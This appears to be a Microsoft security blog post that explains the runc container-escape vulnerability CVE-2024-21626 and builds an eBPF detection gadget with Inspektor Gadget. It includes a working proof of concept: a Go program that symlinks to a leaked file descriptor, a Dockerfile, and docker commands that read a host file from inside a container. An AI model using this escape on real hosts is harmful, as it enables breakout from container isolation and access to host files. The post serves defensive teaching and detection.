On February 20th, Microsoft Defender for Containers released its new sensor component, powered by Inspektor Gadget.
Inspektor Gadget is a Cloud Native Computing Foundation (CNCF) project that aims to change the way we consume and execute eBPF programs by managing their packaging, deployment and execution. If you aren't familiar with eBPF, you can read more about it on ebpf.io, but in short, eBPF allows us to execute sandboxed programs that extend the Linux kernel without having to change it. In this post we will use eBPF to attach to a tracepoint that fires when a process makes a specific system call.
Our new sensor uses Inspektor Gadget as its instrumentation layer, allowing us to collect events in kernel space and analyze them to provide security insights on workloads running in Kubernetes (both at the host level and at the container level).
This blog post will focus on how the Defender for Containers sensor leverages Inspektor Gadget to protect applications running in Kubernetes by detecting vulnerabilities at runtime. We will first learn about a recent vulnerability and how it can be exploited at runtime. Then, we will see how Inspektor Gadget helps us write an eBPF program that can detect this exploitation attempt.
A good way to understand the risks in running containers is to understand what "container escape" is. While some refer to containers as sandboxed or isolated processes, for Linux-based container runtimes this is an incorrect assumption. Container escape is when a malicious actor can breach the isolation boundaries of a container and gain access to the host.
A good way to demonstrate container escape is to look at some known vulnerabilities. On January 31st, 2024, NIST published CVE-2024-21626, one of the vulnerabilities collectively known as "Leaky Vessels". It is a vulnerability in runc, the most popular "low-level" container runtime, and is described as a way to "breakout through process.cwd trickery and leaked fds". The use of the word "trickery" here is both cool and terrifying. It means the issue is easy to demonstrate (as we'll do in this blog post), but also easy for attackers to use, hence its high severity score.
Without going into too much detail, this vulnerability relies on the fact that runc, prior to v1.1.12, doesn't close a "leaked" file descriptor in a timely manner when creating a container or executing commands inside it. The container process inherits that file descriptor and, through it, gains access to the host filesystem.
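Since the fix landed in runc v1.1.12, a quick way to triage a node is to compare its runc version against that release. The following is a minimal sketch of such a check, not an official tool: the helper names parseVersion and predatesFix are hypothetical, pre-release suffixes are ignored, and only the upper bound mentioned above is checked.

```go
package main

import (
	"fmt"
	"strconv"
	"strings"
)

// parseVersion turns "v1.1.11" or "1.1.11-rc1" into [major, minor, patch].
// Pre-release and build suffixes are ignored in this sketch.
func parseVersion(v string) ([3]int, error) {
	var out [3]int
	v = strings.TrimPrefix(strings.TrimSpace(v), "v")
	if i := strings.IndexAny(v, "-+"); i >= 0 {
		v = v[:i]
	}
	parts := strings.Split(v, ".")
	if len(parts) != 3 {
		return out, fmt.Errorf("unexpected version %q", v)
	}
	for i, p := range parts {
		n, err := strconv.Atoi(p)
		if err != nil {
			return out, fmt.Errorf("unexpected version %q: %w", v, err)
		}
		out[i] = n
	}
	return out, nil
}

// predatesFix reports whether the given runc version is older than 1.1.12,
// the release that closes the leaked file descriptor.
func predatesFix(version string) (bool, error) {
	got, err := parseVersion(version)
	if err != nil {
		return false, err
	}
	fixed := [3]int{1, 1, 12}
	for i := range got {
		if got[i] != fixed[i] {
			return got[i] < fixed[i], nil
		}
	}
	return false, nil
}

func main() {
	for _, v := range []string{"1.1.11", "v1.1.12", "1.2.0"} {
		old, err := predatesFix(v)
		fmt.Println(v, old, err)
	}
}
```

The version string itself would typically come from the output of runc --version on the node.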
Let’s start by building a simple Go program that creates a symbolic link to the soon-to-be-leaked file descriptor. Creating the symbolic link doesn’t require the file descriptor to already be leaked when the container is instantiated.
package main

import (
	"fmt"
	"os"
	"os/signal"
	"syscall"
)

func main() {
	// Create a symbolic link /host to /proc/self/fd/7
	err := os.Symlink("/proc/self/fd/7", "/host")
	if err != nil {
		fmt.Println("Error creating symlink:", err)
		return
	}

	// Keep the container alive until it is interrupted or terminated
	exit := make(chan os.Signal, 1)
	signal.Notify(exit, syscall.SIGINT, syscall.SIGTERM)
	<-exit
}
Now let’s write a Dockerfile that builds this image. Note that it copies a go.mod file, so one needs to exist next to the Go source file:
FROM golang:1.22 AS builder
WORKDIR /app
COPY go.mod ./
COPY . .
RUN go build -o main .
FROM ubuntu:latest
COPY --from=builder /app/main /usr/local/bin/main
ENTRYPOINT ["/usr/local/bin/main"]
Let’s build the image and run it:
docker build -t cve-2024-21626 .
docker run --rm --name cve-2024-21626 cve-2024-21626
Let’s create a file in our host filesystem and see if we can access it later:
echo "TOP SECRET" >> /tmp/my_secret
And now, using docker exec, let’s access the host filesystem by changing the current working directory to the symlink we created:
docker exec -it -w /host cve-2024-21626 cat ../../../tmp/my_secret
As you can see, this prints the contents of the file we created earlier on the host filesystem. Spooky.
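To see why three ../ segments are enough, it helps to resolve the path by hand. The sketch below is purely lexical and touches no files. It assumes, based on the public description of the vulnerability rather than anything shown in this post, that the leaked descriptor refers to the host's /sys/fs/cgroup directory. The helper name resolveFromLeakedDir is hypothetical.

```go
package main

import (
	"fmt"
	"path"
)

// resolveFromLeakedDir shows where a relative path ends up when the working
// directory is really a directory on the host. It only manipulates strings.
func resolveFromLeakedDir(hostDir, rel string) string {
	return path.Join(hostDir, rel)
}

func main() {
	// Assumption: /host -> /proc/self/fd/7 -> /sys/fs/cgroup on the host.
	fmt.Println(resolveFromLeakedDir("/sys/fs/cgroup", "../../../tmp/my_secret"))
	// prints "/tmp/my_secret"
}
```

Each ../ climbs one level out of the host directory, so the third one lands at the host's root, and tmp/my_secret is resolved from there.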
So far, we built an app that intentionally creates a symlink to the leaked file descriptor. While creating a symlink by itself isn’t a malicious activity, it's not typical for most applications to intentionally create symbolic links to files within /proc/self/fd/.
Based on that, for our “detection” let’s create a simple eBPF program that records symlinkat syscalls. For simplicity, we will 1) ignore symlink() syscalls and 2) record all symlinkat() syscalls (meaning we won’t compare the symlink target to /proc/self/fd). It is important to note that the eBPF program we are about to build is far from being a complete detection.
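The target comparison we are skipping in the eBPF program could instead be done in user space, on the recorded events. Here is a minimal sketch of such a filter. The function name isProcFdTarget is hypothetical, and the set of accepted path shapes (self, thread-self, or a numeric PID) is an assumption about what is worth flagging, not a complete rule.

```go
package main

import (
	"fmt"
	"path"
	"strconv"
	"strings"
)

// isProcFdTarget reports whether target looks like
// /proc/<self|thread-self|pid>/fd/<n> after lexical cleanup.
func isProcFdTarget(target string) bool {
	if !path.IsAbs(target) {
		return false
	}
	parts := strings.Split(strings.TrimPrefix(path.Clean(target), "/"), "/")
	if len(parts) != 4 || parts[0] != "proc" || parts[2] != "fd" {
		return false
	}
	// The process component must be self, thread-self, or a numeric PID.
	if parts[1] != "self" && parts[1] != "thread-self" {
		if _, err := strconv.ParseUint(parts[1], 10, 32); err != nil {
			return false
		}
	}
	// The last component must be a file descriptor number.
	_, err := strconv.ParseUint(parts[3], 10, 32)
	return err == nil
}

func main() {
	for _, t := range []string{"/proc/self/fd/7", "/proc/1234/fd/3", "/tmp/data"} {
		fmt.Println(t, isProcFdTarget(t))
	}
}
```

A filter like this only narrows down the recorded symlinkat calls; it does not cover other ways of reaching the leaked descriptor.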
To build this eBPF program, we will use Inspektor Gadget! Inspektor Gadget offers lots of cool built-in gadgets (which are essentially eBPF programs). However, at the time of writing this post, Inspektor Gadget doesn’t have a built-in gadget to trace symlink syscalls. Therefore, we will have to write our own eBPF gadget for this purpose. But fear not, writing new gadgets is the fun part!
Let’s begin writing our gadget. First, we want to model the event we will be recording. All we really need for our simple detection is to know that a symlink was created, what its target was, and which container made the syscall. We will see how Inspektor Gadget helps to enrich events with data about the container.
Our event struct consists of two members:
#define NAME_MAX 255

struct event {
	__u8 oldname[NAME_MAX];
	gadget_mntns_id mntns_id;
};
We want to send the events collected by our gadget from the kernel to user space for logging. To do that, we use a mechanism known as a buffer. There are two kinds of buffers that can be used:
Perf buffer is the older mechanism, built on per-CPU buffers, and is available on kernels that predate the ring buffer.
Ring buffer is a newer mechanism, introduced in Linux 5.8, which is more performant for kernel to user-space data exchange.
With that in mind, let’s define a buffer and send the events to it. We will use Inspektor Gadget to define the buffer and later interact with it. Under the hood, it chooses whether to use the ring buffer or fall back to the legacy perf buffer.
To define the buffer:
GADGET_TRACER_MAP(events, 1024 * 256);
Now let’s get to the part where we attach to the symlinkat syscall tracepoint. We will hook into sys_enter_symlinkat, a tracepoint that runs our gadget code on entry to the symlinkat syscall, before the syscall itself is executed.
SEC("tracepoint/syscalls/sys_enter_symlinkat")
int enter_symlinkat(struct syscall_trace_enter *ctx)
{
	...
}
Remember the mntns_id member we defined? Now it’s time to populate it.
We will use the gadget_get_mntns_id() function to get the current mount namespace ID. Inspektor Gadget uses this ID to enrich the event, in user space, with container runtime information such as the container name, image name, runtime and more.
In addition, we are interested only in events that originate from containers. We will use gadget_should_discard_mntns_id() to make sure we capture only those events!
u64 mntns_id;

mntns_id = gadget_get_mntns_id();
if (gadget_should_discard_mntns_id(mntns_id))
	return 0;
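To get a feel for what a mount namespace ID looks like from user space, we can read it for the current process through the /proc/self/ns/mnt link, which has the form mnt:[4026532150]. The following is an illustrative sketch only, not how Inspektor Gadget resolves containers. The helper name parseNsLink is hypothetical.

```go
package main

import (
	"fmt"
	"os"
	"strconv"
	"strings"
)

// parseNsLink extracts the inode number from a mount namespace link
// such as "mnt:[4026532150]".
func parseNsLink(link string) (uint64, error) {
	const prefix, suffix = "mnt:[", "]"
	if !strings.HasPrefix(link, prefix) || !strings.HasSuffix(link, suffix) {
		return 0, fmt.Errorf("unexpected namespace link %q", link)
	}
	return strconv.ParseUint(link[len(prefix):len(link)-len(suffix)], 10, 64)
}

func main() {
	// On Linux, this link identifies the mount namespace of the current process.
	link, err := os.Readlink("/proc/self/ns/mnt")
	if err != nil {
		fmt.Println("reading namespace link:", err)
		return
	}
	id, err := parseNsLink(link)
	fmt.Println(id, err)
}
```

Running this on the host and again inside a container should print different IDs, which is what lets events be attributed to a specific container.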
Now all that’s left is to record the symbolic link’s target and send it to user space through the buffer we defined before. To do that, we will use gadget_reserve_buf() to reserve memory for the event we are about to write to the gadget buffer, and gadget_submit_buf() to submit the event once it is filled in.
struct event *event;

event = gadget_reserve_buf(&events, sizeof(*event));
if (!event)
	return 0;

event->mntns_id = mntns_id;
bpf_core_read_user_str(&event->oldname, sizeof(event->oldname), (void *)ctx->args[0]);

gadget_submit_buf(ctx, &events, event, sizeof(*event));
return 0;
Here's the complete gadget code, which we will save to program.bpf.c:
#include <vmlinux.h>
#include <bpf/bpf_helpers.h>
#include <bpf/bpf_core_read.h>

#include <gadget/buffer.h>
#include <gadget/macros.h>
#include <gadget/mntns_filter.h>
#include <gadget/types.h>

#define NAME_MAX 255

struct event {
	gadget_mntns_id mntns_id;
	__u8 oldname[NAME_MAX];
};

GADGET_TRACER_MAP(events, 1024 * 256);
GADGET_TRACER(symlink, events, event);

SEC("tracepoint/syscalls/sys_enter_symlinkat")
int enter_symlinkat(struct syscall_trace_enter *ctx)
{
	u64 mntns_id;
	struct event *event;

	/* Skip events that do not originate from a container. */
	mntns_id = gadget_get_mntns_id();
	if (gadget_should_discard_mntns_id(mntns_id))
		return 0;

	event = gadget_reserve_buf(&events, sizeof(*event));
	if (!event)
		return 0;

	event->mntns_id = mntns_id;
	/* args[0] is the first symlinkat argument: the symlink target. */
	bpf_core_read_user_str(&event->oldname, sizeof(event->oldname), (void *)ctx->args[0]);

	gadget_submit_buf(ctx, &events, event, sizeof(*event));
	return 0;
}

char LICENSE[] SEC("license") = "GPL";
Now it’s time to build the gadget and execute it. For this purpose, I’ll be using the ig CLI.
At the time of writing this (Inspektor Gadget v0.27.0), building and executing gadget images is an “experimental feature” so we will have to set the IG_EXPERIMENTAL environment variable to true to use it.
export IG_EXPERIMENTAL=true
Now let’s build the gadget:
sudo -E ig image build -t trace-symlink:latest .
And now we can start it:
sudo -E ig run trace-symlink:latest
If we start the cve-2024-21626 container from above, the gadget’s output is:
INFO[0000] Experimental features enabled
RUNTIME.CONTAINERNAME MNTNS_ID OLDNAME
cve-2024-21626 4026532150 /proc/self/fd/7
This shows that the container named cve-2024-21626 invoked the symlinkat syscall with /proc/self/fd/7 as the target, which is most likely an attempt to exploit CVE-2024-21626. We can (and should) add more tracepoints to get more signals on other exploitation attempts of this vulnerability.
All code examples above are also available on GitHub.
In this blog post, we learned what “container escape” is through getting to know CVE-2024-21626. We then wrote an eBPF program using Inspektor Gadget to detect the exploitation attempt.
How can Microsoft Defender for Cloud help?
Microsoft Defender for Containers detects exposure to known and zero-day vulnerabilities. In addition, it detects the execution of malicious containers, like the one simulated in this post. Learn more about Microsoft Defender’s support for container security.
To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog and the Microsoft Defender for Cloud - Microsoft Community Hub to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.